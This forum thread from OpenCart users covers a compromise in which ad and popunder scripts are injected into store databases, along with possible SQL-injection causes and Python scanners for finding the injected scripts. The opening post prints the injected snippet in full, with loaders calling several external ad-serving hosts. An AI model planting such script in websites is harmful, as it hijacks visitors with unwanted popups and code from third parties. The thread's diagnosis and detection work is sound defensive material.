Post by ScuzUK » Tue Jun 20, 2017 10:55 pm

I'm brand spanking new to opencart but I keep getting pop ups after fresh installs. Each install I've changed the admin name/password, changed the admin url but it keeps happening.

What's the cause and how can I stop it?

Code:

<script type="text/javascript">//<![CDATA[ 
(function() {
    var configuration = {
    "token": "11f0dc1ed8453e409e04d86bea962f34",
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&amp;tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&amp;interactive=1&amp;pushup=1"></script>


Post by IP_CAM » Wed Jun 21, 2017 12:08 am

Well, what are you trying to tell us? ???
The Code, you've added, has nothing to do with OC.
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by ScuzUK » Wed Jun 21, 2017 12:29 am

Every time I look at the category description in code in OpenCart it's been changed to the following:
[Image]

What is causing this and how do I stop it?


Post by k2tec » Wed Jun 21, 2017 12:59 am



Post by ScuzUK » Wed Jun 21, 2017 2:42 am

k2tec wrote:
Wed Jun 21, 2017 12:59 am
viewtopic.php?t=183438

Did I miss a "fix" in that thread? Not being rude, totally grateful for the help but I don't see a change this or upload this.


Post by IP_CAM » Wed Jun 21, 2017 3:04 am

well, what FIX do you expect ? There is no simple Fix for such,
it depends on many different things, starting from the server setup
and ending on the individual Software and Installation. That's why it takes
Professionals, to secure Servers and Software, and it's an ongoing
task, to keep it secure. So, better click the link on k2tec's posting, and
you find at least some valuable Information, on, what you can do about.
Ernie


Post by k2tec » Wed Jun 21, 2017 3:16 am

Like IP_CAM says there is no simple solution for this problem. It can be your own PC or a bad module. Or your neighbor on a shared server.
You have to compare your site with original files of OC and search for src='//p79479.clksite.com in your database and delete the javascript.

If it is a fresh install download it from the OC site and not with the installer of your hoster.

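The database search k2tec describes, generalised as an added example that is not part of the thread: this Python sketch scans a SQL dump for `<script src=...>` tags in any table and reports the external hosts they load from, rather than looking for one hostname. The table names and rows in `SAMPLE_DUMP` are constructed, and the code assumes descriptions may be stored HTML-entity-encoded (`&lt;script ...`) as well as raw.

```python
import html
import re
from collections import defaultdict

# <script ... src=//host/...> with optional scheme, optional quote and the
# backslash that mysqldump puts in front of quotes; group 1 is the host.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*\\?['\"]?(?:https?:)?//([^/'\"\\\s>]+)",
    re.IGNORECASE,
)
INSERT_INTO = re.compile(r"^INSERT INTO `?(\w+)`?", re.IGNORECASE)

# Constructed sample rows (hypothetical table contents; hosts taken from the first post).
SAMPLE_DUMP = r"""
INSERT INTO `oc_category_description` VALUES (20,1,'Desktops','&lt;p&gt;Example&lt;/p&gt;&lt;script type=&quot;text/javascript&quot; src=&quot;//go.pub2srv.com/apu.php?zoneid=683723&quot;&gt;&lt;/script&gt;');
INSERT INTO `oc_product_description` VALUES (28,1,'Phone','&lt;p&gt;Plain text&lt;/p&gt;');
INSERT INTO `oc_information_description` VALUES (4,1,'About','<script src=\"//p79479.clksite.com/adServe/banners?tid=79479_127480_7\"></script>');
"""


def find_script_hosts(dump_text, allowed_hosts=()):
    """Return {table: sorted external script hosts} for every INSERT line in a dump."""
    hits = defaultdict(set)
    for line in dump_text.splitlines():
        table = INSERT_INTO.match(line)
        if not table:
            continue
        # Decode entities so encoded and raw markup are matched by one pattern.
        decoded = html.unescape(line)
        for host in SCRIPT_SRC.findall(decoded):
            if host.lower() not in allowed_hosts:
                hits[table.group(1)].add(host.lower())
    return {name: sorted(hosts) for name, hosts in hits.items()}


if __name__ == "__main__":
    for name, hosts in find_script_hosts(SAMPLE_DUMP).items():
        print(name, hosts)
```

Inline loaders such as the `script.src = '//cdn.shorte.st/...'` block in the first post carry no `src` attribute on the tag itself, so they need a separate search for the hostname.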

Post by ADD Creative » Wed Jun 21, 2017 9:23 pm

What theme and extensions are you using? Have you looked in your server logs to see if there is anything unusual?

www.add-creative.co.uk



Post by sims » Thu Jun 22, 2017 7:12 pm

There is a pattern emerging here

What we know as facts:

1. Affects Opencart from versions 1.5.5.1 to 2.3.0.2

2. A wide variety of different themes

3. The code is injected into the database

4. No file(s) are uploaded or altered on the web server

5. No admin login used

6. Many different Hosting companies


Post by IP_CAM » Thu Jun 22, 2017 8:22 pm

well, I am not sure, and so far, I never have heard of someone yet, using a v.1.5.6.x Version,
so, I assume, that it could likely also be an OcMod, doing such things. This, since OcMod Content
is placed in the DB, in contrary to VqMod Content, and if a smart fellow would be able, to
modify an OcMod, it would be the easiest way to mess up a software. And even an unsuccessful
attempt, to install an OcMod, usually leaves its content in a Shop Extension Directory, until removed again,
as I found out, so, a real Pro may find different ways, to add bad Code, without a user being aware of it.

Just a wild guess... 8)
Ernie


Post by ADD Creative » Tue Jun 27, 2017 4:45 am

sims wrote:
Thu Jun 22, 2017 7:12 pm
There is a pattern emerging here

What we know as facts:

1. Affects Opencart from versions 1.5.5.1 to 2.3.0.2

2. A wide variety of different themes

3. The code is injected into the database

4. No file(s) are uploaded or altered on the web server

5. No admin login used

6. Many different Hosting companies

That does seem to be the case. Given that there have been a few reports of the code injected into the database, but not the 1000s you would expect if every OpenCart store was vulnerable (I've not seen it on any of our client's sites so far). There has been at least one known theme with a vulnerability, so could be more out there (viewtopic.php?f=179&t=183812). I believe the issue is less likely to do with the OpenCart core and more likely to be down to extensions or configuration for the following reasons.

While working on sites for clients, we've found a few extensions that have had SQL vulnerabilities (we reported these to the authors). At least one of these was used to successfully attack a site. There must be 100s of badly written extensions out there.

I've looked through a lot of the code for version 1.5.5.1, for a project I work on backporting bug fixes and security fixes to older versions of OpenCart. I've not seen any places where SQL could be injected (that's not to say there isn't). I've used the following regex search in a text editor (Notepad++ but others will also do it). It's not perfect and will miss a lot and for 1.5.5.1 it finds 12 hits in 7 files of possible places, but nothing looks like they could be used in an injection to me.

Code:

'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+

Can you run the regex search on your 1.5.5.1 install to see if you get anything different (search .php, .tpl and .xml files)?

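The regex audit ADD Creative describes, as an added example that is not part of the thread: a Python sketch that applies the posted pattern to every .php, .tpl and .xml file under a directory and lists the lines where a variable is concatenated straight after an opening SQL quote without `db->escape`. It assumes Python's `re` accepts the pattern unchanged from the Notepad++ form; the PHP lines in `demo()` are constructed, not taken from OpenCart.

```python
import os
import re
import tempfile

# The pattern exactly as posted: a quote (optionally followed by %), the end of
# the PHP string, a concatenation dot, then a variable that is not the escape call.
PATTERN = re.compile(r"""'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+""")
EXTENSIONS = (".php", ".tpl", ".xml")


def scan_tree(root):
    """Return sorted (relative path, line number, stripped line) for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if PATTERN.search(line):
                        hits.append((os.path.relpath(path, root), lineno, line.strip()))
    return sorted(hits)


def demo():
    """Build a constructed sample tree in a temp dir and scan it."""
    sample = {  # constructed PHP lines, not taken from OpenCart
        "model/demo.php": "\n".join([
            "<?php",
            '''$a = "... name = '" . $this->db->escape($name) . "'";''',  # escaped
            '''$b = "... id = '" . (int)$id . "'";''',                    # cast
            '''$c = "... code = '" . $code . "'";''',                     # flagged
            '''$d = "... tag LIKE '%" . $tag . "%'";''',                  # flagged
        ]),
        "notes/readme.txt": '''x = '" . $skipped''',  # wrong extension, ignored
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, text in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
        return [(p.replace(os.sep, "/"), n) for p, n, _ in scan_tree(root)]


if __name__ == "__main__":
    print(demo())
```

Running `scan_tree()` on a clean copy of the same OpenCart version and on the live install, then comparing the two hit lists, isolates the lines that come from themes and extensions.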

Post by sims » Tue Jun 27, 2017 7:39 pm

@ADD creative

thanks for taking the time to reply

I stand by my statements - they are all correct (I did not say it was due to core Opencart files)

I literally searched for that regex string (is that what you meant me to do?) and could not find it
EDIT forget that! I forgot to tick the regex box

What do you want me to do with search results?


Post by ADD Creative » Thu Jun 29, 2017 12:33 am

How many results did it get? You could post the results here (remove anything others shouldn't see first). Or message me them and I'll compare to a default install of 1.5.5.1.
